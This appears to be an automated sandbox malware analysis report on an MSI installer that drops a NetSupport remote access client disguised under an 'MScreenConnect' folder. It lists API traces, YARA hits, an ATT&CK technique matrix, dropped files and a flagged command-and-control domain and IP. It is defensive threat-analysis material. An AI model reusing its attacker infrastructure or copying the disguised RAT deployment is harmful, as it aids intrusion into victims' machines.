Source: client32.exe, 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: ProgmanL
Source: client32.exe, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	Binary or memory string: Progman
Source: client32.exe, 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: Shell_TrayWndTraceRunpluginTimeouth^

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_11162513
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: GetLocaleInfoA,	3_2_11159D6E
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_11161FE8
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_11162184
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_111621DF
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_111620DD
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_111623B0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_11162470
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_111624D7
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_6CC8ECA9
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	6_2_11162513
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: GetLocaleInfoA,	6_2_11159D6E
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_11161FE8
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_11162184
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_111621DF
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_111620DD
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_111623B0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_11162470
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_111624D7

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_110E8280 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,

3_2_110E8280

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_110993D0 GetLocalTime,

3_2_110993D0

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_11039030 _calloc,GetUserNameA,_free,_calloc,_free,

3_2_11039030

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_11163293 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,

3_2_11163293

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_11134460 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,

3_2_11134460

Source: C:\Windows\System32\msiexec.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D3DD483E2BBF4C05E8AF10F5FA7626CFD3DC3092 Blob

Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110CD1D0 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	3_2_110CD1D0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1106AC40 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	3_2_1106AC40
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_6CC690A0 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,LeaveCriticalSection,GetTickCount,InterlockedExchange,	3_2_6CC690A0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_110CD1D0 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	6_2_110CD1D0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1106AC40 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	6_2_1106AC40

Source: Yara match	File source: 8.2.client32.exe.6fbb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.client32.exe.830000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.client32.exe.830000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.830000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.830000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.6fbb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.6e0e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.6fbb0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.client32.exe.830000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.6e0e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.6e0e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.830000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2133222658.0000000000832000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2214849103.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2132289855.0000000000832000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2214336000.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2214132599.0000000000832000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4452509174.0000000000832000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2133757091.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2033005646.0000000000832000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.2213191011.0000000000832000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2133358157.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: client32.exe PID: 2468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 5596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 7056, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\MScreenConnect\AudioCapture.dll, type: DROPPED
Source: Yara match	File source: C:\ProgramData\MScreenConnect\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\MScreenConnect\client32.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\MScreenConnect\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\ProgramData\MScreenConnect\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\MScreenConnect\PCICL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	4 Native API	1 DLL Side-Loading	1 DLL Side-Loading	2 Disable or Modify Tools	1 Input Capture	12 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	1 Replication Through Removable Media	2 Service Execution	2 Valid Accounts	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Screen Capture	22 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	At	1 Windows Service	21 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	1 Input Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Windows Service	1 Software Packing	NTDS	3 File and Directory Discovery	Distributed Component Object Model	3 Clipboard Data	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	13 Process Injection	1 Timestomp	LSA Secrets	24 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	31 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	2 Modify Registry	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	21 Access Token Manipulation	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	13 Process Injection	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
72BF1aHUKl.msi	16%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\ProgramData\MScreenConnect\AudioCapture.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\HTCTL32.DLL	4%	ReversingLabs
C:\ProgramData\MScreenConnect\PCICHEK.DLL	2%	ReversingLabs
C:\ProgramData\MScreenConnect\PCICL32.DLL	0%	ReversingLabs
C:\ProgramData\MScreenConnect\TCCTL32.DLL	7%	ReversingLabs
C:\ProgramData\MScreenConnect\UIManagerBrokerps.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\Veeam.Backup.Model.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\WerEnc.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\appverifUI.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\client32.exe	12%	ReversingLabs
C:\ProgramData\MScreenConnect\dpnathlp.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\dpnhupnp.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\dpnlobby.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\dxmasf.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\getuname.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\icmp.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\ir41_qcx.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\ir50_32.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\msvcp140_codecvt_ids.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\msvcr100.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\msvcr100_clr0400.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\pcicapi.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\remcmdstub.exe	0%	ReversingLabs
C:\ProgramData\MScreenConnect\vfcompat.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\wfapigp.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\wiatrace.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\winrsmgr.dll	0%	ReversingLabs
C:\ProgramData\MScreenConnect\winrssrv.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://vault.azure.cn	0%	Avira URL Cloud	safe
https://vault.usgovcloudapi.net-core.usgovcloudapi.netkhttps://manage.windowsazure.us/publishsetting	0%	Avira URL Cloud	safe
https://manage.windowsazure.cn/publishsettings/#.chinacloudapp.cn	0%	Avira URL Cloud	safe
https://management.microsoftazure.de/Chttps://login.microsoftonline.de/Ihttps://management.core.clou	0%	Avira URL Cloud	safe
http://95.179.156.158/fakeurl.htm	0%	Avira URL Cloud	safe
http://www.crossteccorp.com	0%	Avira URL Cloud	safe
https://9.queue.core.chinacloudapi.cn	0%	Avira URL Cloud	safe
https://manage.windowsazure.com/PublishSettings/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
geo.netsupportsoftware.com	172.67.68.212	true	false	high
armayalitim1722.com	95.179.156.158	true	true	unknown
armayalitim.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geo.netsupportsoftware.com/location/loca.asp	false		high
http://95.179.156.158/fakeurl.htm	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.netsupportsoftware.com	PCICL32.DLL.1.dr	false		high
http://geo.netsupportsoftware.com/location/loca.asp?	client32.exe, 00000003.00000003.2336112737.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452809235.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.2336311881.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://%s/testpage.htmwininet.dll	client32.exe, 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmp, HTCTL32.DLL.1.dr	false		high
http://www.netsupportschool.com/tutor-assistant.asp118	client32.exe, 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133757091.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214849103.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	false		high
http://geo.netsupportsoftware.com/location/loca.aspoEaX	client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr	false		high
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)	client32.exe, 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	false		high
http://ocsp.sectigo.com0	pcicapi.dll.1.dr	false		high
http://www.pci.co.uk/supportsupport	client32.exe, 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133757091.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214849103.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	false		high
http://tempuri.org/ResponseUpdateSpec.xsd	Veeam.Backup.Model.dll.1.dr	false		high
https://manage.windowsazure.cn/publishsettings/#.chinacloudapp.cn	Veeam.Backup.Model.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://127.0.0.1RESUMEPRINTING	client32.exe, 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	false		high
http://geo.netsupportsoftware.com/location/loca.aspO	client32.exe, 00000003.00000002.4452754375.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.2336112737.0000000000B80000.00000004.00000020.00020000.00000000.sdmp	false		high
http://%s/testpage.htm	client32.exe, client32.exe, 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmp, HTCTL32.DLL.1.dr	false		high
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r	remcmdstub.exe.1.dr	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	remcmdstub.exe.1.dr, pcicapi.dll.1.dr	false		high
https://management.usgovcloudapi.net/Chttps://login.microsoftonline.us/Uhttps://management.core.usgo	Veeam.Backup.Model.dll.1.dr	false		high
http://repository.certum.pl/cevcsca2021.cer0	72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	false		high
http://%s/fakeurl.htm	client32.exe, client32.exe, 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmp, HTCTL32.DLL.1.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	PCICL32.DLL.1.dr, HTCTL32.DLL.1.dr	false		high
https://sectigo.com/CPS0B	remcmdstub.exe.1.dr	false		high
http://geo.netsupportsoftware.com/location/loca.asp%E	client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://vault.azure.cn	Veeam.Backup.Model.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com02	72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	false		high
https://sectigo.com/CPS0C	remcmdstub.exe.1.dr, pcicapi.dll.1.dr	false		high
https://sectigo.com/CPS0D	remcmdstub.exe.1.dr, PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr, pcicapi.dll.1.dr	false		high
http://crl.certum.pl/ctnca2.crl0l	72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	false		high
http://repository.certum.pl/ctnca2.cer09	72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	false		high
https://vault.azure.net	Veeam.Backup.Model.dll.1.dr	false		high
http://geo.netsupportsoftware.com/location/loca.asp9J	client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://management.microsoftazure.de/Chttps://login.microsoftonline.de/Ihttps://management.core.clou	Veeam.Backup.Model.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.aspg	client32.exe, 00000003.00000003.2336112737.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452809235.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.2336311881.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.certum.pl/CPS0	72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	false		high
http://www.netsupportschool.com/tutor-assistant.asp	client32.exe, 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133757091.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214849103.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	false		high
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#	remcmdstub.exe.1.dr	false		high
https://management.chinacloudapi.cn/?https://login.chinacloudapi.cn/Shttps://management.core.chinacl	Veeam.Backup.Model.dll.1.dr	false		high
http://cevcsca2021.ocsp-certum.com07	72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	false		high
http://www.pci.co.uk/support	client32.exe, 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133757091.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214849103.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	false		high
http://tempuri.org/RequestUpdateSpec.xsd	Veeam.Backup.Model.dll.1.dr	false		high
https://sectigo.com/CPS0	PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr	false		high
http://www.crossteccorp.com	HTCTL32.DLL.1.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	PCICL32.DLL.1.dr, HTCTL32.DLL.1.dr	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr	false		high
http://geo.netsupportsoftware.com/location/loca.aspUJ	client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	remcmdstub.exe.1.dr, pcicapi.dll.1.dr	false		high
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w	72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	false		high
https://www.certum.pl/CPS0	72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	false		high
http://127.0.0.1	client32.exe, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	false		high
http://geo.netsupportsoftware.com/location/loca.aspQEWX	client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	TCCTL32.DLL.1.dr, client32.exe.1.dr	false		high
http://geo.netsupportsoftware.com/location/loca.aspache-Controlno-cache	client32.exe, 00000003.00000002.4452754375.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.2336112737.0000000000B80000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	remcmdstub.exe.1.dr, PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr, pcicapi.dll.1.dr	false		high
http://geo.netsupportsoftware.com/location/loca.aspCEEX	client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	false		high
